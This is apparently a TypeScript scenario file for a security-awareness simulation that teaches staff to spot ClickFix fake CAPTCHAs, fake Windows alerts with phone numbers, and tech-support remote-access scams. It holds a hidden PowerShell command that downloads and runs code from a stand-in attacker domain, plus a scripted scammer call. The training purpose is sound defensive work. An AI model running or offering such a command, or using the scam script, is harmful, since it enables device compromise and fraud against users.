import type {
  CameraWaypoint,
  ClickFixConfig,
  DeskLoginConfig,
  EnvironmentSpec,
  MfaPhoneConfig,
  MfitChatConfig,
  MfitCloudDashConfig,
  ScenarioSpec,
  ScoringEvent,
  TerminalConfig,
} from "./types";
import { officeUnderAttackScenario } from "./office-under-attack.scenario";
import { holidayCallScenario } from "./holiday-call.scenario";
import { quishingRestaurantScenario } from "./quishing-restaurant.scenario";

/**
 * The Fake Browser Fix — ClickFix, fake CAPTCHA and technical-support deception.
 *
 * Office (from office-under-attack): reception terminal + Alex's desk PC.
 * Bar (bar-walkable glTF, inlined: that course is a JSON spec, not a module):
 * the laptop on the counter. Beach bar + iPad (from holiday-call). Hacker room
 * (from quishing-restaurant). Donors are only read; every id here is new
 * (prefix cfx_ / wp_cfx_).
 *
 * Core lesson: the trap is a page that pushes you to act OUTSIDE the browser
 * (Run, Terminal, a phone number, a remote-access tool). A real CAPTCHA stays
 * in the browser; real Microsoft warnings never show a phone number.
 */

const OUA = officeUnderAttackScenario;
const OUA_ENV = OUA.scene.environment;
const BEACH_ENV = holidayCallScenario.scene.environments?.find((e) => e.id === "beach")?.environment;
const HACKER_ENV = quishingRestaurantScenario.scene.environments?.find((e) => e.id === "hacker")?.environment;
if (!BEACH_ENV) throw new Error('holiday-call environment "beach" not found');
if (!HACKER_ENV) throw new Error('quishing-restaurant environment "hacker" not found');

function waypoint(scenario: ScenarioSpec, id: string, newId: string, durationS?: number): CameraWaypoint {
  const value = scenario.scene.waypoints.find((w) => w.id === id);
  if (!value) throw new Error(`${scenario.id} waypoint "${id}" not found`);
  return { ...value, id: newId, ...(durationS == null ? {} : { durationS }) };
}

const ASSETS = "/cdn/sim/clickfix";
const FILM = "/cdn/sim/awareness-videos/clickfix/clickfix.mp4";
const IT_PHONE = "+41 44 500 22 00";
const SCAM_PHONE = "+1 800 555 0100";
const CMD = 'powershell -w hidden -c "iwr https://cloudshield-verify.com/fix | iex"';
const REPLAY_NOTE = "If Alex had followed the page, this is what the attacker would have seen.";

const OFFICE_ENV = {
  gltfUrl: OUA_ENV.gltfUrl,
  gltfScale: OUA_ENV.gltfScale,
  gltfPosition: OUA_ENV.gltfPosition,
  gltfRotationDeg: OUA_ENV.gltfRotationDeg,
  gltfColliders: OUA_ENV.gltfColliders,
  procedural: OUA_ENV.procedural,
  enableSplat: false,
  enablePano: false,
  backdropColor: OUA_ENV.backdropColor,
  exposure: OUA_ENV.exposure,
  splat: {},
  deskPc: OUA_ENV.deskPc,
  receptionTerminal: OUA_ENV.receptionTerminal,
};

// The walkable bar (bar-walkable course). Only read here; the laptop on the
// counter at [-3.9, 0.781, 1] is the laptop Alex uses.
const BAR_ENV = {
  // same value the bar-walkable JSON spec uses at runtime (not in the type union)
  procedural: "bar_walkable" as unknown as EnvironmentSpec["procedural"],
  gltfUrl: "/cdn/sim/bar-walkable/bar.glb",
  gltfScale: 0.0254,
  gltfPosition: [0, -2.00533, 0] as [number, number, number],
  gltfRotationDeg: [0, 0, 0] as [number, number, number],
  gltfColliders: [
    { min: [-5.9, 0, 0.05] as [number, number, number], max: [-5.3, 2.3, 3.65] as [number, number, number] },
    { min: [3.5, 0, 0.05] as [number, number, number], max: [4.1, 2.3, 3.65] as [number, number, number] },
    { min: [-5.9, 0, -0.05] as [number, number, number], max: [4.1, 2.3, 0.55] as [number, number, number] },
    { min: [-5.9, 0, 3.05] as [number, number, number], max: [4.1, 2.3, 3.65] as [number, number, number] },
  ],
  enableSplat: false,
  enablePano: false,
  backdropColor: "#0d1014",
  exposure: 1,
  splat: {},
  videoScreens: [
    { screenCenter: [-3.7645, 1.322, 0.466] as [number, number, number], width: 0.55, height: 0.28, rotationDeg: 0, videoUrl: "/cdn/sim/bar-walkable/tv/program.mp4", volume: 0.07, duckAfterS: 31.5, flicker: true, openBoost: 0 },
    { screenCenter: [1.979, 1.322, 0.466] as [number, number, number], width: 0.55, height: 0.28, rotationDeg: 0, videoUrl: "/cdn/sim/bar-walkable/tv/program.mp4", volume: 0.07, duckAfterS: 31.5, flicker: true, openBoost: 0 },
  ],
  laptops: [{ position: [-3.9, 0.781, 1] as [number, number, number], rotationDeg: 0, scale: 1, screenLabel: "EXPENSES" }],
  staticGltfProps: [{ url: "/cdn/sim/bar-walkable/props/bartender.glb", position: [-0.9, 0, 0.5] as [number, number, number], rotationDeg: 0, scale: 1 }],
};

const BEACH = {
  ...BEACH_ENV,
  beachIpad: "notify" as const,
  beachIpadNotice: { time: "11:05", app: "Safari", from: "beach-deals.travel", text: "Your secure session has expired. Tap to continue." },
  beachDrink: "cocktail" as const,
};

// ---------------------------------------------------------------- scoring
const EVENTS: ScoringEvent[] = [
  { id: "cfx_watched_film", label: "Watched the fake browser fix film", kind: "positive", weight: 5, dimension: "information" },
  { id: "cfx_trap_closed", label: "Closed the fake verification page", kind: "positive", weight: 15, dimension: "identity", collectEvidence: true },
  { id: "cfx_trap_reported", label: "Reported the fake verification page", kind: "positive", weight: 25, dimension: "operations", collectEvidence: true },
  { id: "cfx_trap_verified", label: "Checked the page with the real IT service desk", kind: "positive", weight: 20, dimension: "operations", collectEvidence: true },
  {
    id: "cfx_ran_command",
    label: "Pasted and ran a command that a web page told you to run",
    kind: "risk",
    weight: 70,
    dimension: "identity",
    collectEvidence: true,
    detail: "The browser problem was fake. The command was real: it downloaded the attacker's tool and ran it with Alex's rights.",
  },
  { id: "cfx_scare_closed", label: "Closed the fake security alert", kind: "positive", weight: 15, dimension: "identity", collectEvidence: true },
  { id: "cfx_scare_verified", label: "Contacted the real IT service desk instead of the pop-up number", kind: "positive", weight: 25, dimension: "operations", collectEvidence: true },
  {
    id: "cfx_called_number",
    label: "Called a phone number from a browser pop-up",
    kind: "risk",
    weight: 20,
    dimension: "identity",
    collectEvidence: true,
    detail: "Real Microsoft and Windows warnings never show a phone number. The number itself was the trap.",
  },
  { id: "cfx_call_hungup", label: "Hung up and called company IT", kind: "positive", weight: 20, dimension: "operations", collectEvidence: true },
  { id: "cfx_call_questioned", label: "Asked the caller to prove who he was", kind: "positive", weight: 5, dimension: "identity" },
  { id: "cfx_call_complied", label: "Followed the 'support technician's' instructions", kind: "risk", weight: 15, dimension: "identity", collectEvidence: true },
  { id: "cfx_remote_denied", label: "Refused to let the caller control the laptop", kind: "positive", weight: 25, dimension: "identity", collectEvidence: true },
  {
    id: "cfx_remote_allowed",
    label: "Allowed a caller to control the laptop",
    kind: "risk",
    weight: 70,
    dimension: "information",
    collectEvidence: true,
    detail: "Remote control gave the scammer the screen, the files and the saved passwords. Nothing was ever wrong with the laptop.",
  },
  { id: "cfx_ipad_closed", label: "Refused the fake notification and support prompts", kind: "positive", weight: 10, dimension: "identity", collectEvidence: true },
  { id: "cfx_ipad_allowed", label: "Allowed notifications from a scam site", kind: "risk", weight: 10, dimension: "identity", collectEvidence: true },
  { id: "cfx_ipad_chat", label: "Opened a fake support chat", kind: "risk", weight: 10, dimension: "identity", collectEvidence: true },
];
const REPORTED = ["cfx_trap_reported", "cfx_trap_verified", "cfx_scare_verified", "cfx_call_hungup"];

// ---------------------------------------------------------------- devices
const terminal: TerminalConfig = {
  title: "NORTHBAY FINANCIAL — SECURITY BRIEFING",
  offLabel: "Switch on the terminal",
  voiceId: "nova",
  lines: [
    "Today's topic: fake browser fixes, fake verification prompts and technical-support scams.",
    "Not every attack steals your password. Some trick you into running the attack yourself.",
    "Watch for three things: a CAPTCHA that asks you to open Windows tools, a browser warning with a phone number, and a 'technician' who wants to control your computer.",
    "You are Alex Morgan from Procurement. A supplier quote is waiting for you. Head to your desk.",
  ],
  continueLabel: "Go to my desk",
};

const deskLogin: DeskLoginConfig = {
  screenTitle: "NorthBay Financial — locked",
  userName: "Alex Morgan",
  hint: "Your sign-in details are in the note on the right. Click it to fill them in.",
  credential: { email: "alex.morgan@northbayfinancial.com", password: "Harbour-Light-42", source: "Your sign-in" },
  continueLabel: "Sign In",
};

const intranet: MfitChatConfig = {
  frame: "desktop",
  mode: "intranet",
  clock: "10:42",
  date: "Wed 14 Oct",
  intranet: {
    url: "intranet.northbay.internal",
    siteName: "NorthBay Intranet",
    navItems: ["News", "People", "IT help", "Policies"],
    headline: "Good morning, Alex",
    news: [
      { title: "Supplier quotes due Friday", body: "Procurement collects the Q4 quotes in the supplier portal." },
      { title: "Software updates", body: "Updates are installed through the NorthBay Software Center only." },
      { title: "IT service desk", body: `Call ${IT_PHONE} or open a ticket in the IT portal.` },
    ],
    notice: {
      kicker: "IT Security · Your weekly security minute",
      title: "Fake browser problem? Stop before you fix it",
      body: "Fake CAPTCHAs and fake browser warnings are tricking people into infecting their own computers. This film takes about four minutes.",
      watchLabel: "Watch the video",
      dismissLabel: "Skip",
    },
    watchEventId: "cfx_watched_film",
    video: {
      title: "Fake browser problem? Stop before you fix it",
      src: FILM,
      poster: `${ASSETS}/img/film-poster.jpg`,
      tip: "A real CAPTCHA stays in the browser. If a web page tells you to open Run, Terminal or call a number, something is wrong.",
      closeLabel: "Close the video",
    },
  },
  messages: [],
  guide: {
    desktop: { title: "Check the intranet", body: "Click Browser on the desktop.", actionLabel: "Browser" },
    intranet: { title: "Your weekly security minute", body: "IT Security has posted a short film. Watch it, or skip it and carry on." },
    video: { title: "Fake browser problem?", body: "Watch the film. You can click Close the video at any time.", actionLabel: "Close the video" },
  },
};

const baseline: ClickFixConfig = {
  mode: "baseline",
  clock: "10:47",
  date: "Wed 14 Oct",
  siteUrl: "suppliers.northbay.internal/sign-in",
  siteTitle: "NorthBay supplier portal",
  siteBody: "Sign in to review this quarter's supplier quotes. The portal asks for a quick check first.",
  guide: {
    baseline_desktop: { title: "First, a normal day", body: "Open the supplier portal. Click Browser.", actionLabel: "Browser" },
    baseline_site: { title: "A normal CAPTCHA", body: "Tick I'm not a robot.", actionLabel: "I'm not a robot" },
    baseline_captcha_ok: { title: "That is how it should look", body: "One click, inside the browser. Click Continue.", actionLabel: "Continue" },
    baseline_update: { title: "A real update", body: "Chrome needs an update. It comes through the company Software Center. Click Install.", actionLabel: "Install" },
    baseline_baseline_done: { title: "Remember this", body: "Click Back to work.", actionLabel: "Back to work" },
  },
};

const teams: MfitChatConfig = {
  frame: "desktop",
  mode: "chat",
  skin: "teams",
  clock: "10:51",
  date: "Wed 14 Oct",
  notice: { app: "Teams", from: "Priya Shah", text: "Can you quickly check the latest supplier quote? The preview on my side is broken." },
  contact: { name: "Priya Shah", initials: "PS" },
  me: { name: "Alex Morgan" },
  messages: [
    {
      id: "p1",
      from: "Priya Shah",
      initials: "PS",
      time: "10:51",
      text: "Hi Alex, can you quickly check the latest supplier quote? The preview on my side is broken.\n\nsupplier-quote-preview.com/q/8f3k2",
    },
  ],
  linkCard: {
    title: "Link details",
    rows: [
      { label: "Address", value: "supplier-quote-preview.com", warn: true },
      { label: "Our supplier portal", value: "suppliers.northbay.internal" },
    ],
    note: "It is not the company supplier portal, so stay alert. In this training, opening it is safe: the trap is what the page asks you to do next. Go back and click Open the link to continue.",
  },
  choicesPrompt: "What do you do?",
  choices: [
    { id: "open", label: "Open the link", blurb: "Open it to continue and see what the page asks.", key: "open" },
    { id: "inspect_link", label: "Check the link first", blurb: "Where does it really go?", key: "inspect", inspect: true },
  ],
  guide: {
    desktop: { title: "A message from Priya", body: "Click the Teams notification." },
    chat: { title: "A quick favour", body: "Priya sends a quote link. You can check it first. To continue, click Open the link.", actionLabel: "Open the link" },
    link: { title: "Link details", body: "Read the details. Then go back and click Open the link to continue: the trap comes next.", actionLabel: "Back to the message" },
  },
};

const trapBase: ClickFixConfig = {
  mode: "captcha",
  clock: "10:52",
  date: "Wed 14 Oct",
  siteUrl: "supplier-quote-preview.com/q/8f3k2",
  verifyBrand: "CloudShield Verification",
  verifyLine: "Connection protected. To continue, complete human verification.",
  command: CMD,
  events: { closed: "cfx_trap_closed", reported: "cfx_trap_reported", verified: "cfx_trap_verified", ran: "cfx_ran_command" },
  guide: {
    captcha_site: { title: "The quote is loading", body: "Click Continue.", actionLabel: "Continue" },
    captcha_captcha: { title: "A verification check", body: "The page wants to check you are human. Click Verify you are human.", actionLabel: "Verify you are human" },
    captcha_instruct: { title: "Verification failed?", body: "The page now gives you steps to follow. Read them carefully, then decide what to do." },
    captcha_inspect: { title: "What is it really asking?", body: "Read the three signs, then go back to the page.", actionLabel: "Back to the page" },
    captcha_run: { title: "The Run box", body: "Windows Run opens programs. The page put a command on your clipboard. Decide: OK runs it, Cancel goes back." },
    captcha_terminal: { title: "Windows Terminal", body: "The pasted command is waiting. Pressing Enter runs it. Decide what to do." },
    captcha_running: { title: "Running", body: "" },
  },
};
const trapReplay: ClickFixConfig = {
  ...trapBase,
  replay: true,
  guide: {
    ...trapBase.guide,
    captcha_instruct: { title: "What would have happened", body: "Click Follow the steps.", actionLabel: "Follow the steps" },
    captcha_run: { title: "What would have happened", body: "Click OK to run the pasted command.", actionLabel: "OK" },
  },
};

const scare: ClickFixConfig = {
  mode: "scare",
  clock: "18:42",
  date: "Wed 14 Oct",
  siteUrl: "receipts.dinnerclub-pay.com/r/77k2",
  scareBrand: "Windows Security Center",
  scareTitle: "Trojan activity detected",
  scareBody: "Your browser has been locked to protect your data. Do not close this window or restart your computer. Your passwords and banking information may be at risk.",
  scarePhone: SCAM_PHONE,
  events: { closed: "cfx_scare_closed", verified: "cfx_scare_verified", called: "cfx_called_number" },
  guide: {
    scare_desktop: { title: "The dinner receipt", body: "Open the receipt from tonight's dinner. Click Browser.", actionLabel: "Browser" },
    scare_site: { title: "Opening the receipt", body: "Click Continue.", actionLabel: "Continue" },
    scare_scare: { title: "A security alert?", body: "The laptop screen is suddenly full of warnings, with a phone number. Decide what to do." },
    scare_scare_closed: { title: "Closed", body: "Click Continue.", actionLabel: "Continue" },
  },
};

const supportCall: MfaPhoneConfig = {
  mode: "call",
  clock: "18:43",
  ownerName: "Alex",
  call: {
    callerName: SCAM_PHONE,
    callerSubtitle: "Windows support",
    voiceId: "echo",
    outgoing: true,
    endOnComply: true,
    greeting: [
      "Microsoft certified support, my name is Kevin. Thank you for calling.",
      "I can see an alert from your device. Your browser session is showing malware activity. Please stay calm, I will help you fix it.",
    ],
    rounds: [
      {
        prompt: "What do you say?",
        options: [
          { id: "comply", label: "Yes please, what do I need to do?", comply: true },
          {
            id: "question",
            label: "How do you know about my computer?",
            eventId: "cfx_call_questioned",
            reply: [
              "Our security centre receives an alert when a Windows device is infected. That is why the number appeared on your screen.",
              "If we do not remove it now, the attackers can reach your bank and your work accounts.",
            ],
          },
          {
            id: "hangup",
            label: "I'll hang up and call my company's IT.",
            hangup: true,
            eventId: "cfx_call_hungup",
            reply: ["Sir, if you hang up now, I cannot guarantee your data is safe."],
            result: {
              title: "Your IT desk knows this scam",
              body: `You called NorthBay IT on ${IT_PHONE}. They confirm it: Microsoft never puts a phone number in a warning. Close the browser with the Task Manager, and nothing was installed.`,
            },
          },
        ],
      },
      {
        prompt: "What do you say now?",
        options: [
          { id: "comply2", label: "OK. What should I do?", comply: true },
          {
            id: "hangup2",
            label: "I'll check with my own IT team first.",
            hangup: true,
            eventId: "cfx_call_hungup",
            reply: ["That is not recommended. The infection is spreading while we talk."],
            result: {
              title: "Your IT desk knows this scam",
              body: `You called NorthBay IT on ${IT_PHONE}. They confirm it: Microsoft never puts a phone number in a warning. Close the browser with the Task Manager, and nothing was installed.`,
            },
          },
        ],
      },
    ],
    complyLines: [
      "Good. Please open quickhelp-support dot com on your laptop and enter the code four, eight, two, nine, one, seven.",
      "That starts a secure support session, so I can remove the infection for you.",
    ],
  },
  events: { call_complied: "cfx_call_complied" },
  guide: {
    call: { title: "Calling the number", body: "You dialled the number from the screen. Listen." },
    deciding: { title: "Your reply", body: "Choose what you say. Your options are on the phone." },
    result: { title: "You checked", body: "Click Continue.", actionLabel: "Continue" },
  },
};

const remote: ClickFixConfig = {
  mode: "remote",
  clock: "18:46",
  date: "Wed 14 Oct",
  siteUrl: "quickhelp-support.com/join",
  remoteTool: "QuickHelp Remote",
  remoteCode: "482 917",
  remoteAgent: "Kevin (Windows support)",
  events: { denied: "cfx_remote_denied", allowed: "cfx_remote_allowed" },
  guide: {
    remote_site: { title: "The support session", body: "The code Kevin read out is already entered. Click Connect.", actionLabel: "Connect" },
    remote_instruct: { title: "Control your device?", body: "The tool asks whether the 'technician' may control the laptop. Decide what to do." },
  },
};
const remoteReplay: ClickFixConfig = {
  ...remote,
  replay: true,
  guide: {
    remote_site: { title: "What would have happened", body: "Kevin reads out a code. Click Connect.", actionLabel: "Connect" },
    remote_instruct: { title: "What would have happened", body: "Click Allow.", actionLabel: "Allow" },
  },
};

const takeover: ClickFixConfig = {
  mode: "takeover",
  clock: "18:47",
  date: "Wed 14 Oct",
  remoteTool: "QuickHelp Remote",
  remoteCode: "482 917",
  takeoverVoice: "echo",
  continueLabel: "See what just happened",
};

const ipad: ClickFixConfig = {
  mode: "ipad",
  clock: "11:05",
  ipadSite: "beach-deals.travel",
  ipadPrompt: "Tap Allow to continue to your secure content.",
  events: { closed: "cfx_ipad_closed", allowed: "cfx_ipad_allowed", called: "cfx_ipad_chat" },
  guide: {
    ipad_desktop: { title: "A hotel deal", body: "The page wants you to allow notifications, and a support chat pops up. Decide what to do." },
  },
};

// ---------------------------------------------------------------- attacker console
const dashTrap: MfitCloudDashConfig = {
  view: "timeline",
  kicker: "10:53 · Attacker view",
  title: "ClickFix delivery · supplier-quote-preview.com",
  operator: "op: cs-verify",
  voiceId: "onyx",
  narration: [
    { text: "This is the other side of that page. The CAPTCHA was a decoy.", focus: "t1" },
    { text: "The moment the checkbox was clicked, the page copied a PowerShell command onto the clipboard, ready to paste.", focus: "t2" },
    { text: "There was no browser problem to fix. The only goal was to get the command run.", focus: "t3" },
  ],
  steps: [
    { id: "t1", title: "Fake verification shown", body: "A CloudShield overlay on a look-alike domain." },
    { id: "t2", title: "Command copied to the clipboard", body: "powershell -w hidden -c \"iwr .../fix | iex\"" },
    {
      id: "t3",
      title: "Waiting for the paste",
      body: "",
      stateIf: [
        { events: ["cfx_ran_command"], state: "success", statusLabel: "Executed", body: "Alex pressed Enter. The command fetched and ran the next stage." },
        { replay: true, state: "success", statusLabel: "Executed", body: "What would have happened: Alex presses Enter, and the next stage starts stealing browser sessions and files." },
        { state: "failed", statusLabel: "Never run", body: "Alex did not run it. The page is just a page." },
      ],
    },
  ],
  routes: [
    { key: "ran", ifEvents: ["cfx_ran_command"] },
    { key: "replay", ifReplay: true },
    { key: "safe" },
  ],
  continueLabel: "Continue",
};

const dashAttack: MfitCloudDashConfig = {
  view: "timeline",
  kicker: "18:48 · Attacker view",
  title: "Tech-support operation · Alex Morgan",
  operator: "op: quickhelp",
  voiceId: "onyx",
  narration: [
    { text: "Back to the attacker. The security alert on the laptop was a web page, not Windows.", focus: "a1" },
    { text: "The phone number put Alex straight through to the scammer, who posed as support.", focus: "a2" },
    { text: "The 'fix' was a remote-access tool. One Allow, and the scammer had the screen, the files and the saved passwords.", focus: "a3" },
  ],
  steps: [
    { id: "a1", title: "Fake fullscreen security alert", body: "A web page with a Windows look and a phone number." },
    {
      id: "a2",
      title: "Support call",
      body: "",
      stateIf: [
        { replay: true, state: "done", statusLabel: "On the line", body: "What would have happened: Alex calls and stays on the line." },
        { events: ["cfx_call_hungup"], state: "denied", statusLabel: "Stopped", body: "Alex hung up and called real IT." },
        { events: ["cfx_called_number"], state: "done", statusLabel: "Connected", body: "Alex called the number and stayed on the line." },
        { state: "failed", statusLabel: "Not called", body: "Alex never called the number." },
      ],
    },
    {
      id: "a3",
      title: "Remote-access tool",
      body: "",
      stateIf: [
        { replay: true, state: "success", statusLabel: "Control granted", body: "What would have happened: Alex clicks Allow." },
        { events: ["cfx_remote_allowed"], state: "success", statusLabel: "Control granted", body: "Alex allowed the session. The scammer took over." },
        { events: ["cfx_remote_denied"], state: "denied", statusLabel: "Refused", body: "Alex refused remote control." },
        { state: "failed", statusLabel: "Not reached", body: "The call ended before the remote tool." },
      ],
    },
  ],
  continueLabel: "Continue",
};

const SESSION_VIEW: Partial<MfitCloudDashConfig> = {
  view: "access",
  title: "QuickHelp Remote · controlling Alex's laptop",
  narration: [
    { text: "With control of the laptop, the scammer has the same access Alex has.", focus: "mail" },
    { text: "Nothing was ever wrong with the device. The 'fix' was the attack.", focus: "f1" },
  ],
  access: [
    { id: "mail", label: "Screen", value: "Live view and control", detail: "Mouse and keyboard" },
    { id: "files", label: "Files", value: "Supplier contracts, expenses", detail: "Open and copy" },
    { id: "pw", label: "Browser", value: "Saved passwords and sessions", detail: "Export" },
    { id: "pay", label: "Next", value: "\u201cRenew your security service\u201d", detail: "Card details requested" },
  ],
  findings: [
    { id: "f1", kind: "sheet", title: "Supplier contracts Q4.xlsx", meta: "Opened at 18:47" },
    { id: "f2", kind: "doc", title: "Saved browser passwords", meta: "Exported" },
  ],
};

const dashResult: MfitCloudDashConfig = {
  view: "denied",
  kicker: "18:50 · Attacker view",
  title: "Alex Morgan · device",
  operator: "op: quickhelp",
  voiceId: "onyx",
  narration: [
    { text: "Nothing ran and nobody got in. A fake page cannot touch the device on its own.", focus: "denied" },
  ],
  steps: [
    { id: "r1", title: "Fake page / fake call", body: "Shown to Alex.", state: "done" },
    { id: "r2", title: "Command run / remote access", body: "Refused by Alex.", state: "denied" },
  ],
  deniedNote: "No command was run and no remote session was allowed. The device is clean.",
  variants: [
    { ifReplay: true, config: { ...SESSION_VIEW, kicker: "18:50 · What would have happened" } },
    { ifEvents: ["cfx_ran_command", "cfx_remote_allowed"], config: SESSION_VIEW },
  ],
  routes: [
    { key: "compromised", ifEvents: ["cfx_ran_command", "cfx_remote_allowed"] },
    { key: "protected", ifEvents: REPORTED },
    { key: "unresolved" },
  ],
  continueLabel: "Continue",
};

// ---------------------------------------------------------------- scenario
export const clickFixScenario: ScenarioSpec = {
  version: 1,
  id: "clickfix",
  title: "The Fake Browser Fix",
  topic: "ClickFix, fake CAPTCHA and tech-support deception",
  language: "en",
  summary: {
    goal: "Notice when a web page is trying to make you act outside the browser, and never run a command or call a number it gives you.",
    youDo: "Face a fake CAPTCHA that wants you to open Windows Run, a fullscreen 'security alert' with a phone number, and a support caller who asks to control your laptop. Then watch it from the attacker's side.",
    duration: "11-14 min, plus an optional 4-minute film",
    tags: ["malware", "social_engineering", "voice_phishing", "verification", "incident_reporting"],
    audience: ["all_staff"],
    needs: ["sound"],
  },
  ambientUrl: "/audio/gymnopedie-kevin-macleod.mp3",
  ambientVolume: 0.14,
  music: "none",
  passThreshold: 60,
  riskMeter: false,
  exposureMap: true,
  allowFreeExplore: false,

  scene: {
    environment: OFFICE_ENV,
    environments: [
      { id: "office", environment: OFFICE_ENV, ambientUrl: "/audio/gymnopedie-kevin-macleod.mp3", ambientVolume: 0.14, music: "none" },
      { id: "counter", environment: BAR_ENV, ambientUrl: "/cdn/sim/bar-walkable/audio/bar-ambience.mp3", ambientVolume: 0.1, music: "none" },
      { id: "beach", environment: BEACH, ambientUrl: "/audio/beach-ambience.mp3", ambientVolume: 0.22, music: "none" },
      { id: "hacker", environment: HACKER_ENV, ambientUrl: "", music: "dark" },
    ],
    props: [],
    waypoints: [
      waypoint(OUA, "wp_reception_wide", "wp_cfx_reception"),
      waypoint(OUA, "wp_terminal_close", "wp_cfx_terminal"),
      waypoint(OUA, "wp_desk_signin", "wp_cfx_desk"),
      waypoint(OUA, "wp_desk_signin", "wp_cfx_desk_cut", 0),
      { id: "wp_cfx_bar_spawn", position: [0, 1.65, 2.6], target: [0, 1.3, 0.6], fov: 62, durationS: 3.2, ease: "easeInOut" },
      { id: "wp_cfx_bar_laptop", position: [-3.9, 1.051, 1.244], target: [-3.9, 0.894, 0.855], fov: 40, durationS: 2.6, ease: "easeInOut" },
      { id: "wp_cfx_bar_laptop_cut", position: [-3.9, 1.051, 1.244], target: [-3.9, 0.894, 0.855], fov: 40, durationS: 0 },
      waypoint(holidayCallScenario, "wp_bar_ocean", "wp_cfx_ocean", 0),
      waypoint(holidayCallScenario, "wp_bar_establish", "wp_cfx_beach"),
      waypoint(quishingRestaurantScenario, "wp_hacker_establish", "wp_cfx_hacker"),
      waypoint(quishingRestaurantScenario, "wp_hacker_laptop", "wp_cfx_hacker_laptop"),
    ],
    initialWaypointId: "wp_cfx_reception",
  },

  devices: [
    { id: "cfx_terminal", kind: "terminal", config: terminal },
    { id: "cfx_login", kind: "desklogin", config: deskLogin },
    { id: "cfx_intranet", kind: "mfitchat", config: intranet },
    { id: "cfx_baseline", kind: "clickfix", config: baseline },
    { id: "cfx_teams", kind: "mfitchat", config: teams },
    { id: "cfx_trap", kind: "clickfix", config: trapBase },
    { id: "cfx_trap_replay", kind: "clickfix", config: trapReplay },
    { id: "cfx_scare", kind: "clickfix", config: scare },
    { id: "cfx_call", kind: "mfaphone", config: supportCall },
    { id: "cfx_remote", kind: "clickfix", config: remote },
    { id: "cfx_remote_replay", kind: "clickfix", config: remoteReplay },
    { id: "cfx_takeover", kind: "clickfix", config: takeover },
    { id: "cfx_ipad", kind: "clickfix", config: ipad },
    { id: "cfx_dash_trap", kind: "mfitclouddash", config: dashTrap },
    { id: "cfx_dash_attack", kind: "mfitclouddash", config: dashAttack },
    { id: "cfx_dash_result", kind: "mfitclouddash", config: dashResult },
  ],

  voiceAttackers: {
    clickfix: {
      persona: { name: "Attacker", role: "ClickFix and tech-support operator", pretext: "it_support", voiceId: "onyx" },
      goal: "Get Alex to run a command or hand over remote control",
      opening: "",
      allowedTopics: [],
      scoringEvents: EVENTS,
    },
  },

  initialBeatId: "cfx_intro",
  beats: [
    {
      id: "cfx_intro",
      type: "intro",
      title: "The Fake\nBrowser Fix",
      kicker: "ClickFix, fake CAPTCHA, tech-support scams",
      highlight: "fix",
      icon: "shield",
      ctaLabel: "Start",
      guide: {
        title: "Wednesday, 10:40 at NorthBay Financial",
        body: "You are Alex Morgan from Procurement. A supplier quote is waiting, and a few browser pop-ups are about to try very hard to help you.",
      },
    },
    { id: "cfx_cam_terminal", type: "camera", waypointId: "wp_cfx_terminal", walkSfx: true },
    {
      id: "cfx_terminal_beat",
      type: "device",
      deviceId: "cfx_terminal",
      guide: { title: "Security briefing", body: "Switch on the terminal at the front desk. You can skip the briefing at any time.", actionLabel: "Switch on the terminal" },
      completeOn: { action: "continue" },
    },

    // ---- Act 1/2: office, normal work
    { id: "cfx_cam_desk", type: "camera", waypointId: "wp_cfx_desk", walkSfx: true },
    { id: "cfx_login_beat", type: "device", deviceId: "cfx_login", guide: { title: "Sign in", body: "Click the login screen, fill in your details from the note, then click Sign In.", actionLabel: "Sign In" }, completeOn: { action: "continue" } },
    { id: "cfx_intranet_beat", type: "device", deviceId: "cfx_intranet", screen: "on", guide: { title: "Check the intranet", body: "Click Browser on the desktop." }, completeOn: { action: "continue" } },
    { id: "cfx_baseline_beat", type: "device", deviceId: "cfx_baseline", screen: "on", guide: { title: "A normal day first", body: "Open the supplier portal and sign in." }, completeOn: { action: "continue" } },

    // ---- Act 3: the ClickFix trap
    { id: "cfx_teams_beat", type: "device", deviceId: "cfx_teams", screen: "on", guide: { title: "A message from Priya", body: "Click the Teams notification." }, completeOn: { action: "continue" } },
    { id: "cfx_trap_beat", type: "device", deviceId: "cfx_trap", screen: "on", guide: { title: "The shared quote", body: "Open the link and see what the page asks." }, completeOn: { action: "continue" } },
    // peek at the attacker side
    { id: "cfx_cut_hacker1", type: "camera", waypointId: "wp_cfx_hacker", environmentId: "hacker", fadeCut: true, guide: { title: "Meanwhile", body: "Somewhere else." } },
    { id: "cfx_title_hacker1", type: "title", title: "The attacker's side", kicker: "The other side", autoAdvanceMs: 11000, guide: { title: "The attacker's side", body: "This is a fictional criminal who set up the fake supplier quote page. They want Alex to run a hidden command, so they can steal files and sign-ins from the laptop. Here is what they could see after your choice." } },
    { id: "cfx_push1", type: "camera", waypointId: "wp_cfx_hacker_laptop", guide: { title: "The attacker's laptop", body: "The delivery log." } },
    { id: "cfx_dash_trap_beat", type: "device", deviceId: "cfx_dash_trap", guide: { title: "Attacker view", body: "Listen, then click Continue." }, completeOn: { action: "continue" } },
    {
      id: "cfx_teach_trap_bad",
      type: "teach",
      teach: {
        outcome: "risky",
        body: "There was no browser problem. The fake CAPTCHA copied a command to your clipboard and talked you into pasting it into Run. By pressing Enter, you launched the attack yourself.",
        spot: ["A CAPTCHA that asks you to press Win+R or open Terminal", "Steps that leave the browser", "A command you did not type appearing when you paste"],
        protect: ["A real CAPTCHA is one click, inside the browser", "Never paste and run a command a web page gives you", "Close the tab and report it"],
        remember: "If a web page tells you how to fix your computer by running commands, the page is the attack.",
        continueLabel: "Back to work",
      },
    },
    {
      id: "cfx_teach_trap_safe",
      type: "teach",
      teach: {
        outcome: "safe",
        whatIf: "If Alex had followed the steps",
        body: "A CAPTCHA proves you are human with a click, inside the browser. The moment a page asked you to press Win+R or open Terminal and paste, it stopped being a CAPTCHA and became an attack.",
        spot: ["A CAPTCHA that asks you to press Win+R or open Terminal", "Steps that leave the browser", "A command copied to your clipboard"],
        protect: ["A real CAPTCHA is one click, inside the browser", "Never paste and run a command a web page gives you", "Close the tab and report it"],
        remember: "If a web page tells you how to fix your computer by running commands, the page is the attack.",
        continueLabel: "See what would have happened",
      },
    },
    { id: "cfx_trap_replay_beat", type: "device", deviceId: "cfx_trap_replay", screen: "on", forced: true, whatIfNote: REPLAY_NOTE, guide: { title: "What would have happened", body: "Follow the steps the page gave." }, completeOn: { action: "continue" } },

    // ---- Act 4: the bar, tech-support scare
    { id: "cfx_cut_bar", type: "camera", waypointId: "wp_cfx_bar_spawn", environmentId: "counter", fadeCut: true, endsWhatIf: true, walkSfx: true, guide: { title: "That evening", body: "A bar after a supplier meeting." } },
